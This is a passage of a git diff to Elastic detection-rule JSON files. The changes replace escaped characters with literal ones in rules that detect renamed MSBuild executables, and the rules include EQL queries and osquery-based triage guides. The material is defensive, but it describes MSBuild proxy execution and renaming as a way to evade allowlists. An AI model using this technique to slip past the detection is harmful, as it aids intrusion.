b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_107.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_108.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_108.json index a684b1d4e08..0b419c7bc1b 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_108.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_108.json @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_104.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_104.json index 8e8a5254413..26c01c3c654 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_104.json @@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Using an Alternate Name", - "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name == \"MSBuild.exe\" and\n not process.name : \"MSBuild.exe\"\n", "related_integrations": [ { @@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_105.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_105.json index 7f33418e275..30db2196cc9 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_105.json @@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Using an Alternate Name", - "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name == \"MSBuild.exe\" and\n not process.name : \"MSBuild.exe\"\n", "related_integrations": [ { @@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_106.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_106.json index a6622a8cae0..90724bfc5fb 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_106.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_106.json @@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Using an Alternate Name", - "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name == \"MSBuild.exe\" and\n not process.name : \"MSBuild.exe\"\n", "related_integrations": [ { @@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_107.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_107.json index 471b0c82083..178b627e906 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_107.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_107.json @@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Using an Alternate Name", - "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 